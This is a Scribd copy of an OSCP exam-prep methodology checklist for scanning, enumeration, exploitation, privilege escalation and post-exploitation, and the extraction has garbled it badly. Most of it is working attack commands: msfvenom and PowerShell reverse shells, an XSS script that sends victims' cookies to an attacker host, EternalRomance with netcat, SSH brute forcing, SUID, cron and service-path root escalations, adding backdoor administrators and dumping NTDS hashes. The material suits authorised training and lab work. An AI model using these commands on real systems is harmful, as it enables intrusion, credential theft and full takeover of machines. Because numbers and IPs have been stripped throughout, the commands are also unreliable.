Scribd
Upload
466 views

OSCP Methodology - Dropbox Paper

The document provides an OSCP methodology checklist to assist students with scanning, enumeration, exploitation, privilege escalation, and post-exploitation techniques for labs and exam environments. It includes quick command cheatsheets for tasks like remote desktop connections, transferring files, generating reverse shells, stealing cookies, and scanning networks to identify hosts and services.

Uploaded by

Wiraki Ahemad
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
466 views

OSCP Methodology - Dropbox Paper

The document provides an OSCP methodology checklist to assist students with scanning, enumeration, exploitation, privilege escalation, and post-exploitation techniques for labs and exam environments. It includes quick command cheatsheets for tasks like remote desktop connections, transferring files, generating reverse shells, stealing cookies, and scanning networks to identify hosts and services.

Uploaded by

Wiraki Ahemad
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 15

3/6/2021 OSCP Methodology – Dropbox Paper

OSCP Methodology
Introduction
About 
The checklist aim to assist OSCP students with a baseline methodology for the labs and exam environments. 

Checks
Scanning
Enumeration
Exploitation
Privilege Escalation
Flags
Post Exploitation

Quick Command Cheatsheet

Command Description

Lsof -I Kill a specific service that you don’t use anymore.


Kill - PID
rdesktop -g   IP Remote desktop with screen area set to .

 python -m SimpleHTTPServer Transfer files using Certutil.  This has been my rock
during the OSCP challenge. Host a webserver on your
certutil.exe -urlcache -split -f box, I’ve used python webserver.
http:// /EX.exe http://carnal wnage.attackresearch.com/ / /cert
util-for-delivery-of-files.html
certutil.exe -urlcache -split -f
http:// /ipsec.sh accesschk.txt 
certutil.exe -urlcache -split -f
http:// /icacls.exe icacls.exe 
certutil.exe -urlcache -split -f
http:// /nc.exe nc.exe

msfvenom -p windows/shell/reverse_tcp Multi/Handler example. Allowed during the exam.


LHOST LPORT -f asp wireshell.asp

Within metasploit:
use exploit/multi/handler
set payload sho/x /shell/reverse_tcp  
set lhost
set lport

client New-Object Shell using powershell TCP one liner.


System.Net.Sockets.TCPClient " .XX.XX", ; stream
client.GetStream ; byte bytes .. |
;while i stream.Read bytes, , bytes.Length -ne
; data New-Object -TypeName
System.Text.ASCIIEncoding .GetString bytes, ,
i ; sendback iex data & | Out-String
; sendback sendback "PS " pwd .Path "
"; sendbyte
text.encoding ::ASCII .GetBytes sendback ; stream.Wr

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 1/15
3/6/2021 OSCP Methodology – Dropbox Paper

ite sendbyte, , sendbyte.Length ; stream.Flush ; clien


t.Close
Create cookie.js file. Stealing cookies using XSS.
 
filevar img document.createElement “img” ;
img.src “http://youipaddress/ddos?”
escape document.cookie ;
document.body.appendChild img ;

Copy to webserver and inject.


'" script src "http:// .XX.XX.XX/cookie.js" /script

Non OSCP machines

Scanning
TCP
UDP
Other

TCP

Command Description

nmap -Pn -v -sS -A -T XXIPXXX Run standard nmap scan with services and
timing set.
nmap -Pn -sS --stats-every m --max-retries --max-scan- Run full nmap scan for all ports and save
delay --defeat-rst-ratelimit -T -p - -oA results in folder. Note this scan is time
/root/Documents/XXXX XXIPXXX consuming.

UDP

Command Description

nmap -sU -sV -p- XXIPXXX Run standard nmap UDP scan with services
detection.
nmap -Pn --top-ports -sU --stats-every m --max-retries Run nmap UDP scan for top ports and save
-T -oA  /root/Documents/XXXX XXIPXXX results in folder.

Other

Command Description

#!/bin/bash Enumerate all hostnames within a domain


i " " using DNS. Helpful to identify each PC name
while i -lt " " and their IP address within a network.
do nslookup . i .XX | grep -v "NXDOMAIN" |
grep name | cut -f -d" "
    i i
done

Enumeration

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 2/15
3/6/2021 OSCP Methodology – Dropbox Paper

21 - FTP
80/8080 - HTTP/S
22 - SSH
445/139/135 - SMB 
161 - SNMP
3306 - MySQL
1560 - ORACLE
111/139/334 - RPC
Hausec checklist

21 - FTP

Command Description

nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd- Enumerate FTP using Nmap.


backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve - ,tftp-
enum -p IP
FileZilla or Telnet Browse and try to connect using anonymous
login e.g. User: Anonymous Pass: ano@

80/8080 - HTTP/S

22 - SSH

d Description

Use nc and telnet to connect.

V -t -C /usr/share/SecLists- Brute force for common username and


e c d aacdc cbce ece e f/Passwords/D passwords.
edentials/ssh-betterdefaultpasslist.txt -s IP ssh
-sC IP Check the SSH version to see if it is
vulnerable to any exploits.
-p --script http-shellshock --script-args uri /cgi- Shellshock?
n.cgi IP Attacks vector:
HTTP CGI pages
ser-Agent: :; ; echo "CVE- - vulnerable" SSH require auth
' http:// .xx. .xx/cgi-bin/admin.cgi DHCP server
g or Port forwarding
thub.com/itsKindred/PortPush

445/139/135 - SMB 

Command Description

perl '/root/smbenum/trans root.pl' -t linx -H IP -h IP Port ?


Use trans open source
https://www.exploit-db.com/exploits/ /
nmap -p --script smb-protocols IP Eternal Blue vulnerability?
nmap -p --script smb-vuln-ms - IP Check the SMB version must be v .
Check if the patch is missing.
python woraMS - .py IP   Exploit using
https://github.com/worawit/MS -
nmap IP -sV -Pn -vv -p --script smb-vuln* --script- Nmap SMB scripts get as much info from

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 3/15
3/6/2021 OSCP Methodology – Dropbox Paper

args unsafe these as you can


nmblookup -A IP Connect and enumerate shares get as much
  info from these as you can
enum linux -a IP
  Look specifically for access to home folders
rpcclient -U "" IP with .ssh credentials.
srvinfo Look for access to upload reverse shells.
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
 
smbclient -L IP
smbclient // IP/tmp
smbclient \\\\ IP\\ipc -U john
smbclient // IP/ipc -U john
smbclient // IP/admin -U john
 
Log in with shell:
winexe -U username // IP "cmd.exe" --system
smbclient ‘\\ IP\share' Windows vulnerable to Eternalromance
put nc.exe exploit? 
python eternalromance.py IP "" "" “c:\\share\\nc -nv my_ip
-e cmd.exe”
nmap IP --script msrpc-enum Vulnerable to
exploit/windows/dcerpc/ms _ _dcom ?

161 - SNMP

Command Description

snmpwalk -c public -v IP SNMP Enumeration. I’ve mostly used snmp


snmp-check IP check.
snmpcheck -t IP -c public
perl snmpenum.pl IP public windows.txt

Common community strings:


public
private
community
nmap -vv -sV -sU -Pn -p --script snmp-netstat,snmp- Nmap SNMP checks.
processes IP
nmap -sU -p --script /usr/share/nmap/scripts/snmp- Enumerate windows users via SNMP.
win -users.nse IP

3306 - MySQL

Command Description

nmap -sV -Pn -vv   IP -p --script mysql-audit,mysql- Nmap enumeration for MySQL.
databases,mysql-dump-hashes,mysql-empty-password,mysql-
enum,mysql-info,mysql-query,mysql-users,mysql-
variables,mysql-vuln-cve -
https://infamoussyn.wordpress.com/ / / /gaining-a- Brilliant guide is here. Too long to post.
root-shell-using-mysql-user-defined-functions-and-setuid-
binaries/

1521/1560 - ORACLE

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 4/15
3/6/2021 OSCP Methodology – Dropbox Paper

Command Description

tnscmd g version -h IP E
numerate oracle TNS.
 nmap --script oracle-sid-brute   IP Brute force user accounts and SID.
 nmap --script oracle-brute   IP Check for default credentials.
https://github.com/fuzzdb-
project/fuzzdb/tree/master/wordlists-user-
passwd/oracle

111/139/334 - RPC

Command Description

rpcinfo –p IP Output RPC information.

http://www.tutorialspoint.com/unix_comma
nds/rpcinfo.htm

enum linux –a IP Alternative to enum.exe. Brilliant tool. Look


for open ports you can’t see with nmap. Look
for specific vulnerable services or default
users.

Hausec checklist

Command Description

https://hausec.com/pentesting-cheatsheet/#_Toc Follow the checklist for enumeration if the


above fails.

Exploitation
If you’ve performed proper enumeration you should be able to find exploits using searchsploit and exploitdb. 

If you have modified an exploit, you should include:


The modified exploit code
The URL to the original exploit code
The command used to generate any shellcode (if applicable)
Highlighted changes you have made
An explanation of why those changes were made
I have provided a template I use for exploits during the exam and labs.

Command Description

https://superuser-ltd.github.io/ /msfvenom- A list of MSFVenom one-liners are provided here.


payloads/
msfvenom -p cmd/unix/reverse_bash Compile shell.
lhost lport R
msfvenom -p windows/meterpreter/reverse_tcp Compile shell.

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 5/15
3/6/2021 OSCP Methodology – Dropbox Paper

LHOST Your IP Address LPORT Your Port to


Connect On -f asp shell.asp
msfvenom -p php/reverse_php LHOST IP Compile shell.
Address LPORT -f raw shell.php
msfvenom -p cmd/unix/reverse_netcat Compile shell.
lhost lport R
msfvenom -p windows/shell_reverse_tcp -a x -f Compile shell.
python --platform windows LHOST ip
LPORT -b "\x " EXITFUNC thread --
smallest -e x /fnstenv_mov
gcc -m -Wl,--hash-style both .c -o Compile an exploit for older version.

 If script does not run long enough use Autorunscript to


https://www.packtpub.com/mapt/book/networki migrate to another process first. Default exit options of
ng_and_servers/ / /ch lvl sec scripts are also important.
/using-autorunscript-in-metasploit
https://blog.ropnop.com/upgrading-simple- Good outline on upgrading your shell to full TTYS.
shells-to-fully-interactive-ttys/

https://pen-
testing.sans.org/blog/ / / /escaping-
restricted-linux-shells

Exploit Template

Exploit used  

Source  

Modifications required  

Steps to obtain low level shell  

Privilege Escalation
The below guides will assist you in performing privilege escalation. Always note that you need to follow the template for
exploit if you use any exploit. Train yourself in the habit of documenting your steps. 

Linux

Command Description

find . -name "config.php" PHP and MySQL


get the credentials
mysql -u root -p aCs offsec http://bernardodamele.blogspot.com/ / /comman
use mysql; d-execution-with-mysql-udf.html
select sys_exec "whoami" ;
select sys_eval 'whoami' ; 
. Uname -a Kernel vulnerability. Don’t have to use exploit suggester
. linux-exploit-suggester-2.pl -k exploitdb works just as well. This was rare in most
<KERNEL_VERSION> instances, in the lab you do get some with vulnerable
  kernels. The secret is to compile them correct as shown
gcc spoilers -o exploit -Wl,--hash-style both with the gcc commands.
gcc -m -Wl,--hash-style both
find / ! -path "*/proc/*" -perm - -type f -print World writable files.
/dev/null
find / -perm -u s -type f /dev/null  Suid misconfiguration. Example programs: nmap vim
find / -perm - -type f /dev/null  nano 
Binary with suid permission can be run by anyone, but
when they are run they are run as root! 

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 6/15
3/6/2021 OSCP Methodology – Dropbox Paper

Nmap example 
Nmap: nmap --interactive 
nmap !sh

https://www.pentestpartners.com/security-
blog/exploiting-suid-executables/
. cat ~/.bash_history  Search and grep for keywords in all files.
. cd ~ 
. grep -Eir "password|secret|sudo|<username>"
* | less 
. cd /etc 
. grep -Eir "password|secret|sudo|<username>"
* | less 
. cd /home 
. grep -Eir "password|secret|sudo|<username>"
* | less 
. cd /var/www 
. grep -Eir "password|secret|sudo|<username>"
* | less 
. find . -type f | xargs grep <SEARCHTERM>
sudo -l  Sudo shell escapes.

sudo find /bin -name nano -exec /bin/sh \;   . Notice the list of programs that can run via sudo 
. Loof for any of these:  
sudo awk 'BEGIN system "/bin/sh" '   find 
awk 
echo "os.execute '/bin/sh' " shell.nse && sudo
nmap 
nmap --script shell.nse 
vim 
If you have any of those proceed to exploit.
sudo vim -c '!sh'
. cat /etc/exports  Exploit misconfigured vulnerable NFS.
. If “no_root_squash” option is defined for the http://www.hackingarticles.in/linux-privilege-escalation-
“/tmp” export (or another export), use this using-misconfigured-nfs/
method 
Exploitation  
Kali VM  
. Open command prompt and type: showmount -
e Linux VM IP Address  
. In command prompt type: mkdir /tmp/  
. In command prompt type: mount -o rw,vers
Linux VM IP Address :/tmp /tmp/  
In command prompt type: echo 'int main
setgid ; setuid ; system "/bin/bash" ; return
; ' /tmp/ /x.c  
. In command prompt type: gcc /tmp/ /x.c -o
/tmp/ /x  
. In command prompt type: chmod s /tmp/ /x
 
Linux VM  
. In command prompt type: /tmp/x  
. In command prompt type: id 
s -aRl /etc/cron* | awk ' ~ /w. /' /dev/null  Cron path  
cron.d  Use this if /etc/crontab has a PATH you have write to
cron.daily 
cron.deny 
cron.hourly 
cron.monthly 
cron.weekly 
crontab 
 
Linux VM  
. In command prompt type: cat /etc/crontab  
. From the output, notice the value of the
“PATH” variable 

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 7/15
3/6/2021 OSCP Methodology – Dropbox Paper

Exploitation  
Linux VM  
. In command prompt type: echo 'cp /bin/bash
/tmp/bash; chmod +s /tmp/bash' >
/home/user/overwrite.sh  
. In command prompt type: chmod +x
/home/user/overwrite.sh  
. Wait 1 minute for the Bash script to execute.  
. In command prompt type: /tmp/bash -p  
. In command prompt type: id 
Linux VM   Cron Tar wildcard  
. In command prompt type: cat /etc/crontab  Use this if /etc/crontab has a tar command or other
. From the output, notice the script command that has a wildcard
“/usr/local/bin/compress.sh”  
. In command prompt type: cat
/usr/local/bin/compress.sh 
. From the output, notice the wildcard (*) used
by ‘tar’. 
Add checkpoint variables to tar: 
. echo 'cp /bin/bash /tmp/bash; chmod +s
/tmp/bash' > /home/user/runme.sh 
. touch /home/user/--checkpoint=1 
. touch /home/user/--checkpoint-
action=exec=sh\ runme.sh 
. Wait for script to execute 
. /tmp/bash -p 
. id
. echo 'cp /bin/bash /tmp/bash; chmod +s Cron file overwrite  
/tmp/bash' >> /usr/local/bin/overwrite.sh  Use this if /etc/crontab has a file that you have write
. Wait for script to execute  permission to
. /tmp/bash -p 
. id
dpkg -l | grep -i exim is version is below Vulnerable exim.

https://github.com/HackerFantastic/Public/blob/master
Is exim compiled with perl support?  /exploits/cve- - .sh

exim -bV -v | grep -i perl  

Does exim.conf contain “perl sartup” option? 

Use cve- - .sh 


uname -a  Some manual enumeration within files.
env 
id 
cat /proc/version 
cat /etc/issue 
cat /etc/passwd 
cat /etc/group 
cat /etc/shadow 
cat /etc/hosts 
grep -vE "nologin" /etc/passwd
# Debian  Check vulnerable software.
dpkg -l  Use searchsploit or exploitdb. Sometimes github has an
  exploit as well.
# CentOS, OpenSuse, Fedora, RHEL 
rpm -qa CentOS / openSUSE  
 
# OpenBSD, FreeBSD 
pkg_info
http://www.dankalia.com/tutor/ / Is there a punctuation ‘.’ mark in the PATH. 
.htm
Check all home directories .ssh folders  Check for root SSH keys.

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 8/15
3/6/2021 OSCP Methodology – Dropbox Paper

ls -la ~/.ssh/ 

find / -name "id_dsa*" -o -name "id_rsa*" -o -


name "known_hosts" -o -name "authorized_hosts" -
o -name "authorized_keys" /dev/null |xargs -r

ls -la
ps aux | grep root  View privileged services e.g. root that you might be able
  to exploit.
ps aux | awk ' print '|xargs -r ls -la /dev/null
|awk '!x '
https://sushant .gitbooks.io/total-oscp- I followed these guides when it failed.
guide/privilege_escalation_-_linux.html

https://blog.g tmi k.com/ / /basic-linux-


privilege-escalation/

Windows

Command Description

Run the famous JollyKatz enumeration script. Work


https://github.com/LennonCMJ/pentest_script/bl through the results. I prefer this as it’s not as much of a
ob/master/WindowsPE.md information overload as the other enumeration scripts.
http://rynudus.blogspot.com/ / /sql- Does it run SQL?
ninja.html
tasklist /fi "USERNAME ne NT Any services running as SYSTEM?
AUTHORITY\SYSTEM" /fi "STATUS eq running"
username 'user'  Powershell script to run-as
password 'password' 

securePassword ConvertTo-SecureString
password -AsPlainText -Force 

credential New-Object
System.Management.Automation.PSCredential
username, securePassword 

Start-Process your evil bizz here -Credential


credential 
If Windows check the Group Policy Preferences.
\\REMOTE_HOST\SYSVOL\REMOTE_HOST\Po
licies\ POLICY_ID \Machine\Preferences\ 
The following configuration files may be present:  https://memorycorruption.org/windows/ / / /N
Services\Services.xml  otes-On-Windows-Privilege-Escalation.html  
ScheduledTasks\ScheduledTasks.xml 
Printers\Printers.xml 
Drives\Drives.xml 
DataSources\DataSources.xml
Potato.exe -ip -cmd "net user tater Check if the hot potato exploit can be used.
Winter /add && net localgroup
administrators tater /add" -disable_exhaust true https://github.com/SecWiki/windows-kernel-
exploits/tree/master/MS -

https://github.com/breenmachine/RottenPotatoNG
wmic service get  Check to exploit trusted service paths. 
name,displayname,pathname,startmode |findstr . List all unquoted service paths.
/i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i - Check folder permissions on results. Look for M
/v """  modify or W write for current user. 
wmic service get
name,displayname,startmode,pathname | findstr
/i /v "C:\Windows\\" |findstr /i /v """ 

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 9/15
3/6/2021 OSCP Methodology – Dropbox Paper

icacls "C:\Program Files x \Privacyware"


Check: Check to exploit vulnerable services. Accesscheck will
accesschk.exe -uwcqv  "Authenticated Users" c:\* determine which service bin paths can be modified.
 /accepteula 
Then we can use sc qc to determine the properties, you
accesschk.exe -qwsu "Authenticated Users" c:\* want to look for the following listed below.
Look for:
sc qc SERVICE_NAME SERVICE_CHANGE_CONFIG 
SERVICE_ALL_ACCESS 
Exploit: GENERIC_WRITE 
sc config upnphost  binpath "net localgroup GENERIC_ALL 
Administrators backdoora /add" depend "" 
WRITE_DAC 
WRITE_OWNER 
sc config upnphost  obj ".\LocalSystem"
password ""  
binpath "net localgroup Administrators
backdoora /add" 
https://www.gracefulsecurity.com/privesc-insecure-
service-permissions/ 
sc config upnphost  obj ".\LocalSystem"
password "" 
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri
-windows-services-all-roads-lead-to-system-
whitepaper.pdf

reg query Is always elevated installations enabled on the server? We


HKCU\SOFTWARE\Policies\Microsoft\Windows can exploit that.
\Installer /v AlwaysInstallElevated 
First check the registry, both must be set to .
reg query
HKLM\SOFTWARE\Policies\Microsoft\Windows Use MSFvenom to create msi exploit.
\Installer /v AlwaysInstallElevated

msfvenom -p windows/adduser
USER rottenadmin PASS P@ssword ! -f msi -
o rotten.msi

msiexec /quiet /qn /i


C:\Users\Steve.INFERNO\Downloads\rotten.msi
for a in " path:; ";" " do accesschk.exe PATH exploit.
 /accepteula -dqv " ~a"
/ What system are we connected to?  Some manual enumeration.
systeminfo | findstr /B /C:"OS Name" /C:"OS
Version" 
// Get the hostname and username if available  
hostname 
echo username  
// Get users 
net users 
net user username  
// Networking stuff 
ipconfig /all 
// Printer? 
route print 
// ARP-arific 
arp -A 
// Active network connections 
netstat -ano 
// Firewall fun Win XP SP only  
netsh firewall show state 
netsh firewall show config 
// Scheduled tasks 
schtasks /query /fo LIST /v 
// Running processes to started services 
tasklist /SVC 

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 10/15
3/6/2021 OSCP Methodology – Dropbox Paper

net start 
// Driver madness 
DRIVERQUERY 
// WMIC fun Win / -- XP requires admin  
wmic /? 
# Use wmic_info script! 
// WMIC: check patch level 
wmic qfe get
Caption,Description,HotFixID,InstalledOn 
// Search pathces for given patch 
wmic qfe get
Caption,Description,HotFixID,InstalledOn | findstr
/C:"KB.." /C:"KB.." 
// AlwaysInstallElevated fun 
reg query
HKLM\SOFTWARE\Policies\Microsoft\Windows
\Installer\AlwaysInstallElevated 
reg query
HKCU\SOFTWARE\Policies\Microsoft\Windows
\Installer\AlwaysInstallElevated 
// Other commands to run to hopefully get what
we need 
dir /s *pass* *cred* *vnc* *.config* 
findstr /si password *.xml *.ini *.txt 
reg query HKLM /f password /t REG_SZ /s 
reg query HKCU /f password /t REG_SZ /s 
// Service permissions 
sc query 
sc qc service_name  
// Accesschk stuff 
accesschk.exe /accepteula always do this
first!!!!!  
accesschk.exe -ucqv service_name requires
sysinternals accesschk!  
accesschk.exe -uwcqv "Authenticated Users" *
won't yield anything on Win  
accesschk.exe -ucqv service_name  
// Find all weak folder permissions per drive. 
accesschk.exe -uwdqs Users c:\ 
accesschk.exe -uwdqs "Authenticated Users" c:\ 
// Find all weak file permissions per drive. 
accesschk.exe -uwqs Users c:\*.* 
accesschk.exe -uwqs "Authenticated Users" c:\*.* 
//Find services with unquoted service paths:  
wmic service get
name,displayname,pathname,startmode |findstr
/i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i
/v """ 
// Binary planting 
sc config service_name binpath "C:\nc.exe -nv
RHOST RPORT -e
C:\WINDOWS\System \cmd.exe" 
sc config service_name obj ".\LocalSystem"
password "" 
sc qc service_name to verify!  
net start service_name  
Pre-compiled windows exploits.
http://www.bhafsec.com/wiki/index.php/Windo
ws_Privilege_Escalation 

https://github.com/AusJock/Privilege-
Escalation/tree/master/Windows 

https://github.com/abatchy /WindowsExploits
https://sushant .gitbooks.io/total-oscp- Some brilliant resources if the above fails.

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 11/15
3/6/2021 OSCP Methodology – Dropbox Paper

guide/privilege_escalation_windows.html 

http://hackingandsecurity.blogspot.com/ /
/oscp-windows-priviledge-escalation.html  

https://www.sploitspren.com/ - - -
Windows-Privilege-Escalation-Guide/ 

Dump

Local
Document the steps used to escalate to local access. Most instances you will be escalating to Root/Admin and not another
local user.

Root/Admin
Document the steps used to escalate to root access. For exploits make use of the exploit template.

Flags
Proof.txt
ifconfig/ipconfig
whoami/id

The below commands will list all .txt files to identify the flags. Used in several CTFs and useful for the OSCP challenge.

Windows Linux

for /R ".\" A in *.txt do echo ~fA ~zA | findstr /v "echo “ind . -type f -name "*.txt"

Each local.txt and proof.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP
address of the target by using ipconfig or ifconfig. An example of this is shown below:

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 12/15
3/6/2021 OSCP Methodology – Dropbox Paper

Proof
Paste your proof here.

Post Exploitation
Use this for the labs. Note that the machines in the exam is not connected and I could only advise to spend more time on
enumeration and exploitation than post exploitation.

Linux

File Description

/etc/resolv.conf  Contains the current name servers DNS for the system. This is a globally readable
file that is less likely to trigger IDS alerts than /etc/passwd 
/etc/motd  Message of the Day. 

/etc/issue  Debian - current version of distro 

/etc/passwd  List of local users 

/etc/shadow  List of users’ passwords’ hashes requires root  

~/.bash_history d   Will give you some directory context 

~/.mysql_history  MySQL database history - could have passwords

Windows

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 13/15
3/6/2021 OSCP Methodology – Dropbox Paper

File Description

net user username password /ADD  Add yourself as administrator.

net localgroup Administrators username


/ADD
impacket-secretsdump -system Dump the active directory.
'root/Documents/OSCP/ .X.XXX/syst
em.save' -ntds
'/root/Documents/OSCP/ .X.XXX/ntd
s.dit' LOCAL
netsh firewall add portopening TCP Enable specific firewall ports.
"Service Firewall" ENABLE ALL
Arp -a   Look for any connections to other hosts in the lab. Here you
netstat -abno  have a pivoting opportunity.
ipconfig /all 
route print 
schtasks /query /fo LIST /v 
netsh firewall show config
for /R ".\" A in *.txt do echo ~fA ~zA Look at text files.
| findstr /v "echo
Net shares Look at file shares.

Get-ADComputer -Filter * -Properties *  | Enumerate users and computers using powershell.


Select-Object @ Label "Computer
Name";Expression _.Name ,@ Label
"Last Logon Date";Expression
_.LastLogonDate  
Get-ADUser -Filter * -Properties *  | Select-
Object @ Label "Logon Name";Expression
_.sAMAccountName ,  
                  @ Label "Last LogOn
Date";Expression
_.LastLogonDate.ToString 'yyyy-MM-
dd' , 
                  @ Label "Created
Date";Expression
_.whenCreated.ToString 'yyyy-MM-dd' , 
                  @ Label " Month
Dormant";Expression if
_.LastLogonDate -gt / / -and
_.LastLogonDate -lt time   'True' Else
'False' , 
                  @ Label "Password
Expire";Expression if
_.PasswordNeverExpires -eq 'TRUE'  
'Enabled' Else 'Disabled' , # the 'if
statement# replaces _.Enabled 
                  @ Label "Account
Status";Expression if _.Enabled -eq
'TRUE'   'Enabled' Else 'Disabled' , # the
'if statement# replaces _.Enabled  
                  @ Label "Admin
User";Expression   if _.adminCount -eq
' '   'TRUE' Else 'FALSE' , # the 'if
statement# replaces _.Enabled 
                  @ Label
"Description";Expression _.Description ,  
                  @ Label
"Applications";Expression _.info , 
                  @ Label "First
Name";Expression _.GivenName ,   

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 14/15
3/6/2021 OSCP Methodology – Dropbox Paper

                  @ Label "Last
Name";Expression _.Surname ,  
                  @ Label "Display
Name";Expression _.DisplayName , 
                  @ Label "Job Title";Expression
_.Title ,  
                  @ Label "Company";Expression
_.Company , 
                  @ Label
"Department";Expression _.Department ,
 
                  @ Label "Office";Expression
_.OfficeName ,  
                  @ Label "Phone";Expression
_.telephoneNumber ,  
                  @ Label "Email";Expression
_.Mail
Windows guide for post exploitation.
http://hackingandsecurity.blogspot.com/
/ /oscp-windows-post-
exploitation.html

https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q 15/15

You might also like